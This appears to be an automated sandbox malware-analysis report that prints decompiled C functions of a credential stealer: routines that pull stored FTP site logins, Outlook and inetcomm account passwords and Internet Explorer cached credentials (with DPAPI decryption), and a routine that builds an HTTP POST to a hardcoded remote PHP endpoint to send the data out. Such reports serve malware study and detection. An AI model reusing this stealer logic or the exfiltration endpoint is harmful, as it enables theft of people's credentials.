Function 0040912E, Relevance: 36.2, APIs: 16, Strings: 8, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040912E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				int _v28;
				int* _v32;
				int* _v36;
				int* _v40;
				int* _v44;
				int* _v48;
				CHAR* _v52;
				CHAR* _v56;
				CHAR* _v60;
				CHAR* _v64;
				char* _v68;
				int _v72;
				int _v76;
				int _v80;
				void* _t85;
				int _t87;
				int _t90;
				int _t94;
				int _t101;
				int _t108;
				int _t110;
				int _t115;
				int _t133;
				int _t136;
				int _t138;
				void* _t140;
				int _t141;
				int* _t143;

				_t85 = E00401E53(_a8);
				if(_t85 != 0) {
					_t87 = E00403F1F(_a8);
					__eflags = _t87;
					if(_t87 == 0) {
						E00408EC5(_a12, _a16);
						_t90 = E00401F1B(__eflags, _a8,  &_v20);
						__eflags = _t90;
						if(_t90 != 0) {
							_t94 = E00402515(_v12, _v8);
							__eflags = _t94;
							if(_t94 != 0) {
								_v24 = _t94;
								_t143 = _t94;
								__eflags =  *_t143;
								if(__eflags != 0) {
									_v52 = E004090F2(__eflags, _t143);
									_push(lstrcmpA("#2c", _v52));
									_push(lstrcmpA("#2d", _v52));
									_t101 = lstrcmpA("#2e", _v52);
									_pop(_t141);
									_pop(_t138);
									__eflags = _t101;
									if(_t101 == 0) {
										L10:
										__eflags = _t138;
										if(_t138 != 0) {
											_v80 = 0;
										} else {
											_v80 = 1;
										}
										asm("cld");
										_t140 = 0xffffffff;
										asm("repne scasb");
										__eflags =  *_t143;
										if ( *_t143 != 0) goto L14;
										_v28 = 0;
										while(1) {
											__eflags =  *_t143;
											if(__eflags == 0) {
												goto L54;
											}
											_v56 = E004090F2(__eflags, _t143);
											__eflags = _v28;
											if(_v28 != 0) {
												__eflags = _v28 - 1;
												if(_v28 != 1) {
													__eflags = _v28 - 2;
													if(_v28 != 2) {
														__eflags = _v28 - 3;
														if(_v28 != 3) {
															__eflags = _v28 - 4;
															if(_v28 != 4) {
																__eflags = _v28 - 5;
																if(_v28 != 5) {
																	__eflags = _v28 - 6;
																	if(_v28 == 6) {
																		_v28 = 2;
																	}
																} else {
																	_v48 = _t143;
																	__eflags = _v80;
																	if(__eflags == 0) {
																		_v28 = 6;
																	} else {
																		_v28 = 2;
																	}
																	_v68 = 0;
																	_v60 = 0;
																	_v64 = 0;
																	_v72 = 0;
																	_v76 = 0;
																	_v68 = E004090F2(__eflags, _v32);
																	_v60 = E004090F2(__eflags, _v40);
																	_v64 = E004090F2(__eflags, _v48);
																	__eflags =  *0x415824;
																	if( *0x415824 != 0) {
																		__eflags =  *0x415824 - 1;
																		if( *0x415824 != 1) {
																			_t115 = 0;
																			__eflags = 0;
																		} else {
																			_t115 = StrCmpNIA(_v68, "ftp.", lstrlenA("ftp."));
																		}
																	} else {
																		_t133 = StrCmpNIA(_v68, "ftp://", lstrlenA("ftp://"));
																		__eflags = _t133;
																		if(_t133 != 0) {
																			_t133 = StrCmpNIA(_v68, "http://", lstrlenA("http://"));
																		}
																		_t115 = _t133;
																		__eflags = _t115;
																		if(_t115 != 0) {
																			_t115 = StrCmpNIA(_v68, "https://", lstrlenA("https://"));
																		}
																	}
																	__eflags = _t115;
																	if(_t115 == 0) {
																		_v72 = E00408FA6(_t140, _v60, lstrlenA(_v60));
																		_v76 = E00408FA6(_t140, _v64, lstrlenA(_v64));
																		__eflags = _v68;
																		if(_v68 != 0) {
																			__eflags = _v76;
																			if(_v76 != 0) {
																				E00401486(_a4, 0xbeef0000);
																				E004014E8(_a4, _v68);
																				E004014E8(_a4, _v72);
																				E004014E8(_a4, _v76);
																			}
																		}
																	}
																	E004017D5(_v68);
																	E004017D5(_v60);
																	E004017D5(_v64);
																	E004017D5(_v72);
																	E004017D5(_v76);
																}
															} else {
																_v44 = _t143;
																_v28 = 5;
															}
														} else {
															_v40 = _t143;
															_v28 = 4;
														}
													} else {
														_v36 = _t143;
														_v28 = 3;
													}
												} else {
													_v32 = _t143;
													_v28 = 2;
												}
												__eflags = _v28;
												if(_v28 != 0) {
													_t108 = lstrcmpA(_v56, 0x414806);
													__eflags = _t108;
													if(_t108 == 0) {
														_v28 = 1;
													}
													_t110 = lstrcmpA(_v56, "---");
													__eflags = _t110;
													if(_t110 == 0) {
														_v28 = 2;
													}
												}
											} else {
												_t136 = lstrcmpA(_v56, 0x414806);
												__eflags = _t136;
												if(_t136 == 0) {
													_v28 = 1;
												}
											}
											E004017D5(_v56);
											asm("cld");
											_t140 = 0xffffffff;
											asm("repne scasb");
											__eflags =  *_t143;
											if( *_t143 != 0) {
												continue;
											}
											goto L54;
										}
									} else {
										__eflags = _t141;
										if(_t141 == 0) {
											goto L10;
										} else {
											_t138 = _t138;
											__eflags = _t138;
											if(_t138 == 0) {
												goto L10;
											}
										}
									}
									L54:
									E004017D5(_v52);
								}
								E004017D5(_v24);
							}
							E00401FB0( &_v20);
						}
						return E00408F7D();
					} else {
						return _t87;
					}
				} else {
					return _t85;
				}
			}

0x0040913d
0x0040913f
0x0040914e
0x0040914e
0x00409150
0x0040915d
0x00409169
0x0040916e
0x00409170
0x00409181
0x00409181
0x00409183
0x00409189
0x0040918c
0x0040918e
0x00409191
0x0040919d
0x004091ad
0x004091bb
0x004091c4
0x004091c9
0x004091ca
0x004091cb
0x004091cd
0x004091db
0x004091db
0x004091dd
0x004091e8
0x004091df
0x004091df
0x004091df
0x004091ef
0x004091f2
0x004091f7
0x004091f9
0x004091fb
0x004091fd
0x00409204
0x00409204
0x00409207
0x00000000
0x00000000
0x00409213
0x00409216
0x0040921a
0x00409239
0x0040923d
0x0040924e
0x00409252
0x00409263
0x00409267
0x00409278
0x0040927c
0x0040928d
0x00409291
0x00409404
0x00409408
0x0040940a
0x0040940a
0x00409297
0x00409297
0x0040929a
0x0040929e
0x004092a9
0x004092a0
0x004092a0
0x004092a0
0x004092b0
0x004092b7
0x004092be
0x004092c5
0x004092cc
0x004092db
0x004092e6
0x004092f1
0x004092f4
0x004092fb
0x0040934f
0x00409356
0x00409372
0x00409372
0x00409358
0x0040936b
0x0040936b
0x004092fd
0x00409315
0x00409315
0x00409317
0x0040932c
0x0040932c
0x00409331
0x00409331
0x00409333
0x00409348
0x00409348
0x0040934d
0x00409374
0x00409376
0x00409389
0x0040939d
0x004093a0
0x004093a4
0x004093a6
0x004093aa
0x004093b4
0x004093bf
0x004093ca
0x004093d5
0x004093d5
0x004093aa
0x004093a4
0x004093dd
0x004093e5
0x004093ed
0x004093f5
0x004093fd
0x004093fd
0x0040927e
0x0040927e
0x00409281
0x00409281
0x00409269
0x00409269
0x0040926c
0x0040926c
0x00409254
0x00409254
0x00409257
0x00409257
0x0040923f
0x0040923f
0x00409242
0x00409242
0x00409411
0x00409415
0x0040941f
0x00409424
0x00409426
0x00409428
0x00409428
0x00409437
0x0040943c
0x0040943e
0x00409440
0x00409440
0x0040943e
0x0040921c
0x00409224
0x00409229
0x0040922b
0x0040922d
0x0040922d
0x00409234
0x0040944a
0x0040944f
0x00409452
0x00409457
0x00409459
0x0040945b
0x00000000
0x00000000
0x00000000
0x0040945b
0x004091cf
0x004091cf
0x004091d1
0x00000000
0x004091d3
0x004091d3
0x004091d3
0x004091d5
0x00000000
0x00000000
0x004091d5
0x004091d1
0x00409461
0x00409464
0x00409464
0x0040946c
0x0040946c
0x00409475
0x00409475
0x00409481
0x00409154
0x00409154
0x00409154
0x00409143
0x00409143
0x00409143

Strings

#2e, xrefs: 004091BF
ftp., xrefs: 00409358, 00409363
https://, xrefs: 00409335, 00409340
http://, xrefs: 00409319, 00409324
#2d, xrefs: 004091B1
#2c, xrefs: 004091A3
---, xrefs: 0040942F
ftp://, xrefs: 004092FD, 00409308

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: #2c$#2d$#2e$---$ftp.$ftp://$http://$https://
API String ID: 0-1526611526
Opcode ID: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
Instruction ID: 96101fffbdba439034eac4df85c0c476d3f464cc9ab40425e2c0fc1f81b8675a
Opcode Fuzzy Hash: 44378f815597745bbc4f01509e57f7de6c1b5a1070497c7f43b3eeb3b84ec0c5
Instruction Fuzzy Hash: C391597190420AEADF21AFA1DD46BEEBAB1AF54308F24403BF011B11E2D7BD0D91DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A88E, Relevance: 21.2, APIs: 7, Strings: 7, Instructions: 178
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A88E(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				CHAR* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				CHAR* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr* _v56;
				char _v60;
				char _v64;
				char _v68;

				_v8 = E004017EC(0x2000);
				_v12 = E004017EC(0x2000);
				_v16 = E004017EC(0x2000);
				_v20 = E004017EC(0x2000);
				_v24 = E004017EC(0x2000);
				_v28 = E004017EC(0x2000);
				_v32 = E004017EC(0x2000);
				wsprintfA(_v8, "SiteServer %d\\Host", _a12);
				wsprintfA(_v12, "SiteServer %d\\WebUrl", _a12);
				wsprintfA(_v16, "SiteServer %d\\Remote Directory", _a12);
				wsprintfA(_v20, "SiteServer %d-User", _a12);
				wsprintfA(_v24, "SiteServer %d-User PW", _a12);
				wsprintfA(_v28, "%s\\Keychain", _a8);
				wsprintfA(_v32, "SiteServer %d\\SFTP", _a12);
				_v36 = E00401C8E( *0x4140fe, _a8, _v8, 0);
				_v40 = E00401C8E( *0x4140fe, _a8, _v12, 0);
				_v44 = E00401C8E( *0x4140fe, _a8, _v16, 0);
				_v48 = E00401C8E( *0x4140fe, _v28, _v20, 0);
				_v52 = E00401C8E( *0x4140fe, _v28, _v24, 0);
				_v56 = E00401C8E( *0x4140fe, _a8, _v32,  &_v68);
				if(_v36 != 0 && _v48 != 0 && _v52 != 0 && E0040A774(_v48,  &_v64) != 0 && _v64 != 0 && E0040A774(_v52,  &_v60) != 0 && _v60 != 0) {
					E00401486(_a4, 0xbeef0010);
					E004014E8(_a4, _v36);
					E004014E8(_a4, _v40);
					E004014E8(_a4, _v44);
					E004014BC(_a4, _v48, _v64);
					E004014BC(_a4, _v52, _v60);
					if(_v56 == 0 || _v68 != 4) {
						E00401486(_a4, 0);
					} else {
						E00401486(_a4,  *_v56);
					}
				}
				E004017D5(_v8);
				E004017D5(_v12);
				E004017D5(_v16);
				E004017D5(_v20);
				E004017D5(_v24);
				E004017D5(_v28);
				E004017D5(_v32);
				E004017D5(_v36);
				E004017D5(_v40);
				E004017D5(_v44);
				E004017D5(_v48);
				E004017D5(_v52);
				return E004017D5(_v56);
			}

0x0040a89e
0x0040a8ab
0x0040a8b8
0x0040a8c5
0x0040a8d2
0x0040a8df
0x0040a8ec
0x0040a8fa
0x0040a90d
0x0040a920
0x0040a933
0x0040a946
0x0040a959
0x0040a96c
0x0040a987
0x0040a99d
0x0040a9b3
0x0040a9c9
0x0040a9df
0x0040a9f7
0x0040a9fe
0x0040aa54
0x0040aa5f
0x0040aa6a
0x0040aa75
0x0040aa83
0x0040aa91
0x0040aa9a
0x0040aab6
0x0040aaa2
0x0040aaaa
0x0040aaaa
0x0040aa9a
0x0040aabe
0x0040aac6
0x0040aace
0x0040aad6
0x0040aade
0x0040aae6
0x0040aaee
0x0040aaf6
0x0040aafe
0x0040ab06
0x0040ab0e
0x0040ab16
0x0040ab24

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

wsprintfA.USER32 ref: 0040A8FA
wsprintfA.USER32 ref: 0040A90D
wsprintfA.USER32 ref: 0040A920
wsprintfA.USER32 ref: 0040A933
wsprintfA.USER32 ref: 0040A946
wsprintfA.USER32 ref: 0040A959
wsprintfA.USER32 ref: 0040A96C

Part of subcall function 0040A774: lstrlenA.KERNEL32(?), ref: 0040A789

Part of subcall function 0040A774: LocalFree.KERNEL32(00000000), ref: 0040A874

Part of subcall function 004014E8: lstrlenA.KERNEL32(00000000), ref: 004014F4

Strings

SiteServer %d\WebUrl, xrefs: 0040A905
SiteServer %d-User, xrefs: 0040A92B
%s\Keychain, xrefs: 0040A951
SiteServer %d\Host, xrefs: 0040A8F2
SiteServer %d-User PW, xrefs: 0040A93E
SiteServer %d\SFTP, xrefs: 0040A964
SiteServer %d\Remote Directory, xrefs: 0040A918

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wsprintf$Locallstrlen$AllocFree
String ID: %s\Keychain$SiteServer %d-User$SiteServer %d-User PW$SiteServer %d\Host$SiteServer %d\Remote Directory$SiteServer %d\SFTP$SiteServer %d\WebUrl
API String ID: 2275035253-1012938452
Opcode ID: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
Instruction ID: 9451ae28163268872172244b5ac3737368aa19c67849d8b2cc615b1fa428e2da
Opcode Fuzzy Hash: 297afe6489245746d90da32aa81436c0f57db6a18f2daa773280244a879e5037
Instruction Fuzzy Hash: B661A635940209FBDF126FE2DD46AEDBA72AF04314F14803AF510351F2E77A4964EB59

Uniqueness

Uniqueness Score: -1.00%

Function 00403B74, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 156
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403B74(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, int _a12, intOrPtr _a16) {
				long _v16;
				void* _v20;
				signed int _v40;
				long _v44;
				int _v48;
				void* _v64;
				intOrPtr _v68;
				CHAR* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				intOrPtr _v92;
				char _v96;
				int _t83;
				int _t89;
				int _t91;
				int _t95;
				int _t99;
				int _t104;
				void* _t110;

				_t110 = __edx;
				_v88 = 0;
				_t104 = 0;
				_v68 = E004017EC(0x1000);
				_v76 = E004017EC(0x1000);
				_v72 = E004017EC(0x1000);
				_v92 = E004017EC(0x1000);
				_v96 = 0x1000;
				memset( &_v64, 0, 0x3c << 0);
				_v64 = 0x3c;
				_push(_v68);
				_pop( *_t11);
				_push(_v76);
				_pop( *_t13);
				_v44 = 0xfff;
				_v16 = 0xfff;
				if(InternetCrackUrlA(_a4, 0, 0x80000000,  &_v64) == 0 || _v48 == 0) {
				} else {
					_v84 = 0xfff;
					_t83 = InternetCreateUrlA( &_v64, 0x80000000, _v72,  &_v84);
					__eflags = _t83;
					if(_t83 != 0) {
						 *_v76 = 0;
						memset( &_v64, 0, 0x3c << 0);
						_v64 = 0x3c;
						_push(_v76);
						_pop( *_t28);
						_v44 = 0xfff;
						_v16 = 0xfff;
						_t89 = InternetCrackUrlA(_v72, 0, 0,  &_v64);
						__eflags = _t89;
						if(_t89 == 0) {
							L7:
							L21:
							E004017D5(_v68);
							E004017D5(_v72);
							E004017D5(_v76);
							E004017D5(_v92);
							if(_v88 != 0) {
								E004017D5(_v88);
							}
							return _t104;
						}
						__eflags = _v48;
						if(_v48 != 0) {
							_t91 =  &_v96;
							_push(_t91);
							_push(_v92);
							_push(0);
							L00410E54();
							__eflags = _t91;
							if(_t91 < 0) {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)");
							} else {
								wsprintfA(_v72, "POST %s HTTP/1.0\r\nHost: %s\r\nAccept: */*\r\nAccept-Encoding: identity, *;q=0\r\nAccept-Language: en-US\r\nContent-Length: %lu\r\nContent-Type: application/octet-stream\r\nConnection: close\r\nContent-Encoding: binary\r\nUser-Agent: %s\r\n\r\n", _v76, _v68, _a12, _v92);
							}
							_t95 = E00403749(_v40 & 0x0000ffff, 0, _v68, 0, _v40 & 0x0000ffff);
							__eflags = _t95;
							if(_t95 != 0) {
								_v80 = _t95;
								E00403B46(_v80);
								_t99 = E004037CD(_v80, _v72, lstrlenA(_v72));
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _a12;
									if(_a12 == 0) {
										L18:
										_t104 = _t99;
										__eflags = _t104;
										if(__eflags != 0) {
											_t104 = E004039C1(_t110, __eflags, _v80, _a16,  &_v88);
										}
										L20:
										_push(_v80);
										L00410E72();
										goto L21;
									}
									_t99 = E004037CD(_v80, _a8, _a12);
									__eflags = _t99;
									if(_t99 != 0) {
										goto L18;
									}
									goto L20;
								}
								goto L20;
							} else {
								goto L21;
							}
						}
						goto L7;
					}
				}
			}

0x00403b74
0x00403b7c
0x00403b83
0x00403b8f
0x00403b9c
0x00403ba9
0x00403bb6
0x00403bb9
0x00403bca
0x00403bcc
0x00403bd3
0x00403bd6
0x00403bd9
0x00403bdc
0x00403bdf
0x00403be6
0x00403c02
0x00403c0f
0x00403c0f
0x00403c26
0x00403c2b
0x00403c2d
0x00403c37
0x00403c44
0x00403c46
0x00403c4d
0x00403c50
0x00403c53
0x00403c5a
0x00403c6c
0x00403c71
0x00403c73
0x00403c7b
0x00403d41
0x00403d44
0x00403d4c
0x00403d54
0x00403d5c
0x00403d65
0x00403d6a
0x00403d6a
0x00403d74
0x00403d74
0x00403c75
0x00403c79
0x00403c80
0x00403c83
0x00403c84
0x00403c87
0x00403c89
0x00403c8e
0x00403c90
0x00403cc6
0x00403c92
0x00403ca6
0x00403cab
0x00403cdd
0x00403cdd
0x00403cdf
0x00403ce3
0x00403ce9
0x00403d02
0x00403d02
0x00403d04
0x00403d08
0x00403d0c
0x00403d22
0x00403d24
0x00403d24
0x00403d26
0x00403d37
0x00403d37
0x00403d39
0x00403d39
0x00403d3c
0x00000000
0x00403d3c
0x00403d1c
0x00403d1c
0x00403d1e
0x00000000
0x00000000
0x00000000
0x00403d20
0x00000000
0x00403ce1
0x00000000
0x00403ce1
0x00403cdf
0x00000000
0x00403c79
0x00403c2f

APIs

Part of subcall function 004017EC: LocalAlloc.KERNEL32(00000040,-00000080,?,00402BA6,00000000), ref: 004017FA

InternetCrackUrlA.WININET(?,00000000,80000000,0000003C), ref: 00403BFB
InternetCreateUrlA.WININET(0000003C,80000000,?,00000FFF), ref: 00403C26
InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 00403C6C
ObtainUserAgentString.URLMON(00000000,?,00001000), ref: 00403C89
wsprintfA.USER32 ref: 00403CA6
wsprintfA.USER32 ref: 00403CC6

Part of subcall function 00403B46: setsockopt.WSOCK32(00000000,0000FFFF,00000080,00000001,00000004), ref: 00403B6B

lstrlenA.KERNEL32(?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403CF1
closesocket.WSOCK32(?,?,?,00000000,?,?,?,00000000,?,00001000,00001000,00001000,00001000,?,http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php), ref: 00403D3C

Strings

http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php, xrefs: 00403B7A
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0), xrefs: 00403CB0
<, xrefs: 00403C46
POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s, xrefs: 00403C9E, 00403CBE

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Crackwsprintf$AgentAllocCreateLocalObtainStringUserclosesocketlstrlensetsockopt
String ID: <$Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)$POST %s HTTP/1.0Host: %sAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: %luContent-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: %s$http://n3systems.com.br/layouts/libraries/.trash/cphorde/rem.php
API String ID: 963220733-3240631248
Opcode ID: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
Instruction ID: e979f89f125927e8ba2600574156917aa8cba9cf8a6433267ee3f1946e8ad0ea
Opcode Fuzzy Hash: 7642405448b9db263cc2cd96d94ea72e3310f2010d9a13769c868c7c74737870
Instruction Fuzzy Hash: A351F772D00248EAEF11AFD1CC42BEDBFB9AF04345F14403AF510B61A1D7B95A95DB19

Uniqueness

Uniqueness Score: -1.00%

Function 0040F5D2, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 103
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040F5D2(void* __ecx, intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				char _v3076;
				int _v3080;
				int _v3084;
				intOrPtr _v3088;
				char _v3092;
				char _v3096;
				char _v3100;
				intOrPtr _v3104;
				void* _t56;
				int _t61;
				void* _t66;

				_t66 = __ecx;
				E00409EFB(_a4,  &_v1028, _a20);
				E00409F46(_a4, _a8,  &_v2052, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v3076, 0x3ff, 0, 0);
				_v3092 = 0x10;
				_v3088 = 2;
				_v3084 = 0;
				_v3080 = 0;
				_t56 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v3100,  &_v3096,  &_v3092, 0);
				if(_v3100 == 0 || _v3096 == 0) {
					return _t56;
				} else {
					if(lstrcmpiA( &_v1028, "identification") == 0) {
						L4:
						_v3104 = 0xbeef0005;
						if(lstrcmpiA( &_v2052, "inetcomm server passwords") == 0) {
							L7:
							if(_v3104 != 0xbeef0007) {
								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 1);
							} else {
								_t61 = E0040F4E3(_t66, _v3104, _a12, _v3096, _v3100, _a16, _a8, 0);
							}
							L10:
							_push(_v3096);
							L00410DCA();
							return _t61;
						}
						_v3104 = 0xbeef0006;
						if(lstrcmpiA( &_v2052, "outlook account manager passwords") == 0) {
							goto L7;
						}
						_v3104 = 0xbeef0007;
						_t61 = lstrcmpiA( &_v2052, "identities");
						if(_t61 != 0) {
							goto L10;
						}
						goto L7;
					}
					_t61 = lstrcmpiA( &_v1028, "identitymgr");
					if(_t61 != 0) {
						goto L10;
					}
					goto L4;
				}
			}

0x0040f5d2
0x0040f5e8
0x0040f5fd
0x0040f61b
0x0040f620
0x0040f62a
0x0040f634
0x0040f63e
0x0040f672
0x0040f67c
0x0040f778
0x0040f68f
0x0040f6a2
0x0040f6bd
0x0040f6bd
0x0040f6da
0x0040f71a
0x0040f724
0x0040f767
0x0040f726
0x0040f743
0x0040f743
0x0040f76c
0x0040f76c
0x0040f772
0x00000000
0x0040f772
0x0040f6dc
0x0040f6f9
0x00000000
0x00000000
0x0040f6fb
0x0040f711
0x0040f718
0x00000000
0x00000000
0x00000000
0x0040f718
0x0040f6b0
0x0040f6b7
0x00000000
0x00000000
0x00000000
0x0040f6b7

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

Part of subcall function 00409F46: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F82
Part of subcall function 00409F46: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F8B

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040F61B
lstrcmpiA.KERNEL32(?,identification), ref: 0040F69B
lstrcmpiA.KERNEL32(?,identitymgr,?,identification), ref: 0040F6B0
lstrcmpiA.KERNEL32(?,inetcomm server passwords,?,identification), ref: 0040F6D3
lstrcmpiA.KERNEL32(?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F6F2
lstrcmpiA.KERNEL32(?,identities,?,outlook account manager passwords,?,inetcomm server passwords,?,identification), ref: 0040F711
CoTaskMemFree.OLE32(00000000,?,inetcomm server passwords,?,identification), ref: 0040F772

Strings

identities, xrefs: 0040F705
outlook account manager passwords, xrefs: 0040F6E6
inetcomm server passwords, xrefs: 0040F6C7
identitymgr, xrefs: 0040F6A4
identification, xrefs: 0040F68F

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrcmpi$ByteCharFreeMultiTaskWide
String ID: identification$identities$identitymgr$inetcomm server passwords$outlook account manager passwords
API String ID: 636431001-4287852900
Opcode ID: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
Instruction ID: ea03687d9fb03fd5940d117c1db2d536975b738c704b47cbe732ea10429568b2
Opcode Fuzzy Hash: 6670717f35b3c7cb924859923af077f70eb34972e318cc14aa56e4278a2d0328
Instruction Fuzzy Hash: 2C412B7180021DEBEF319F91CE41FDA7B7ABF05304F0041A6BA08B6091DB799AD99F95

Uniqueness

Uniqueness Score: -1.00%

Function 0040A1A9, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040A1A9(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				int _t58;

				E00409EFB(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
					L5:
					_t58 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t58 == 0) {
						_t58 = E0040A13B(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x41442d != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t58 =  *0x41442d( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t58 != 0) {
								E0040A13B(_v2096, _a12, _v2088, _v2092, _a16);
								_t58 = LocalFree(_v2088);
							}
						}
					}
					L11:
					_push(_v2072);
					L00410DCA();
					return _t58;
				}
				_v2096 = 0xbeef0001;
				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
				if(_t58 != 0) {
					goto L11;
				}
				goto L5;
			}

APIs

Part of subcall function 00409EFB: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F34
Part of subcall function 00409EFB: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 00409F3D

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 0040A1DD
lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 0040A267
lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A286
lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 0040A2A5
StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 0040A2BE
LocalFree.KERNEL32(?), ref: 0040A331
CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 0040A35B

Strings

WininetCacheCredentials, xrefs: 0040A27A
Internet Explorer, xrefs: 0040A25B
MS IE FTP Passwords, xrefs: 0040A299
DPAPI: , xrefs: 0040A2B2

Memory Dump Source

Source File: 00000001.00000001.649108673.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Freelstrcmpi$ByteCharMultiTaskWide$Local
String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
API String ID: 1761448497-3076635702
Opcode ID: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction ID: d0109d7229b507364c02bffd69db74d2b73ca55b941890eea464c4d2f255e551
Opcode Fuzzy Hash: 5149302b925e7ebfd9dfd41346574a285818239cdaffdd8d8b8ec34254ad70c1
Instruction Fuzzy Hash: CE415E7240021DEADF219F50CC42FDA77B9BF08304F0480E6B64475190DB759AE58FD9

Uniqueness

Uniqueness Score: -1.00%

